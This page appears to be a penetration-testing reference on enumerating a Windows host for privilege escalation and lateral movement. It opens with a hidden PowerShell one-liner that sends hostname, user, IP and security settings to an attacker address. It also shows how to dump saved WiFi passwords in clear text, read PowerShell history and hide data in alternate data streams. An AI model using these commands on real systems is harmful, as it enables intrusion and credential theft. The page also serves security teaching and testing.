Windows
Introduction
This section contains some useful commands that will help you enumerate the Windows system, obtaining helpful information for a later Privilege Escalation or Lateral movements.
General information exfiltration
C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -nop -w hidden -c iwr -UseBasicParsing -Uri "http://10.10.10.4/index.html?h=$(hostname)?x64=$([Environment]::Is64BitProcess)?u=$($env:USERNAME)?cd=$(Get-Location)?ip=$((Test-Connection -ComputerName (hostname) -Count 1).IPV4Address.IPAddressToString)?clm=$($ExecutionContext.SessionState.LanguageMode)?AppLockerS=$(Get-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status)?AppLockerR=$(Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String)"
PowerShell History
c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
User and group enumeration
whoami
echo %username%
Privileges
Displays the current user name and groups to which the user belongs and the security identifiers (SIDs), notifications and privileges for the current user's access token.
whoami /all
Enumerate the SE privileges of the current user
whoami /priv
Groups
net localgroup
net localgroup "<Group>"
# View Domain Groups
net "<Group>" /domain
Operative system
Architecture:
wmic os get osarchitecture
General information:
ver
systeminfo
Environment variables:
cmd /c set
Hostname & Domain
echo %USERDOMAIN% -> Returns domain name
systeminfo | findstr /B /C:"Domain"
Network enumeration
Hardcoded domains:
The file /etc/hosts
also exist on Windows under the following path.
C:\Users\Marmeus>type C:\Windows\System32\drivers\etc\hosts
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
Port enumeration:
netstat -ano
Display routing table:
route print
Network configuration:
ipconfig /all
Shares:
net share
net1 share
SMB Signing enabled
Get-SmbServerConfiguration | select EnableSecuritySignature
View computers on your network:
net view
Status Firewall / AV / Windows Defender
# Status windefender
sc query windefend
# Status firewall
netsh firewall show state
netsh firewall show config
netsh advfirewall show allprofiles
# Deprecated command
netsh advfirewall firewall dump
WiFi Passwords: On windows 10 we can obtain WiFi Passwords for each AP that the computer has ever connected.
1. netsh wlan show profile
2. netsh wlan show profile name=<ProfileName> key=clear
Show ARP tables:
arp -a
Constrained Language Enabled (CLM)
Constrained Language Mode is a security feature designed to restrict the capabilities of PowerShell scripts, making them more secure and less prone to exploitation. When Constrained Language Mode is enabled, PowerShell restricts the use of certain language elements and cmdlets to help prevent potential malicious activities.
$ExecutionContext.SessionState.LanguageMode
# If enabled it wouldn't work
[Math]::Cos(1)
[System.Console]::WriteLine("ConstrainedModeTest")
To bypass this countermeasure go to Countermeasure Evasion - CLM
AMSI
AMSI stands for Antimalware Scan Interface, and it is a security feature in Windows designed to help protect against script-based malware.
There are several ways to check if AMSI is enabled:
# Alternative 1
'amsiutils'
'amsicontext'
'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
'Invoke-Mimikatz'
# Alternative 2
set-content .\ADS_Test.txt:EICAR 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
To bypass this countermeasure go to Countermeasure Evasion - AMSI
AppLocker
AppLocker is a security feature in Windows operating systems that allows administrators to control which applications and executable files are allowed to run on a system. It provides a way to define and enforce application whitelisting policies, helping organizations enhance their security by preventing the execution of unauthorized or potentially malicious software.
You can check if AppLocker is enabled with the following command.
ApGet-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status
Obtain AppLocker rules:
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-ExecutionPolicy -List | Format-Table -AutoSize
To bypass this countermeasure go to Countermeasure Evasion - AppLocker.
Files Enumeration
PowerShell History
type c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
Disks
There are several ways to obtain the mounted disks on the system.
# CMD
list volume
# PowerShell
c:\Users>powershell -c get-psdrive -psprovider filesystem
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
C 19,69 9,70 FileSystem C:\ Users
W 2,52 17,48 FileSystem W:\
Alternate Data Streams
Alternate Data Streams (ADS) are a file attribute only found on the NTFS file system. In this system, a file is built up from a couple of attributes, one of them is $Data
, also known as the data attribute. Looking at the regular data stream of a text file there is no mystery. It simply contains the text inside the text file. But that is only the primary data stream.
This one is sometimes referred to as the unnamed data stream since the name string of this attribute is empty ( "" ). So any data stream that has a name is considered an alternate.
Find Data Alternate Streams in a directory.
dir /r
If you want to search a directory or drive for ADS you can use this command in the root of the target:
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
Adding data to an alternate data stream.
echo payaso | set-content -path .\prueba.txt -stream hidden
echo pepe | prueba.txt:pepe
Read Alternate Data Streams.
gc -path .\prueba.txt -stream hidden
more < prueba.txt:hidden
Permissions
Windows permission terminology can be quite challenging to understand. In this subsection, you will find how to obtain the attributes and their meaning.
# Directory permissions
Get-acl C:\backup\Scripts\* | Format-Table -Wrap -Autosize
# Directory / File permissions
icacls "<Path>"
Simple Rights
F
Full access
M
Modify access
RX
Read and execute access
R
Read-only access
W
Write-only access
Specific Rights
D
Delete
RC
Read control
WDAC
Write DAC
WO
Write Owner
S
Synchronize
AS
Access System security
MA
Maximum Allowed
GR
Generic Read
GW
Generic Write
GE
Generic Execute
GA
Generic All
RD
Read Data / List Directory
WD
Write Data / Add File
AD
Append Data / Add subdirectory
REA
Read Extended Attributes
WEA
Writer Extended Attributes
X
Execute
DC
Delete Child
RA
Read Attributes
WA
Write Attributes
Inheritance righsts (Applied only to directories)
OI
Object Inherit
CI
Container Inherit
IO
Inherit Only
NP
Do not propagate inherit
I
Permission inherited from parent container
Service rights
The first letter represents Allow (A) the opposite of Deny which would be represented by a (D).
CC
SERVICE QUERY CONFIG
Ask the SCM for the service’s current configuration
LC
SERVICE QUERY STATUS
Ask the SCM for the service’s current status
SW
SERVICE ENUMERATE DEPENDENTS
List dependent services
LO
SERVICE INTERROGATE
Ask the service its current status
CR
SERVICE USER_DEFINED CONTROL
Send a service control defined by the service’s author
RC
READ CONTROL
Read the security descriptor on this service.
RP
SERVICE START
Start the service
WP
Service stop
Stop the service
DT
Service Pause continue
Pause or continue the service
List Installed HotFixes
List all installed patches on the system.
Get-Hotfix
Running processes
tasklist
Scheduled Tasks
List/enumerate all the scheduled tasks present on the system.
(Get-ScheduledTask [-TaskName '<TASK_NAME>']).Actions
# List scheduled tasks under Users folder
Get-ScheduledTask -TaskPath "\Users\*"
# List specific information on specified Tasks
Get-ScheduledTaskInfo -TaskName <Full Path>
Last updated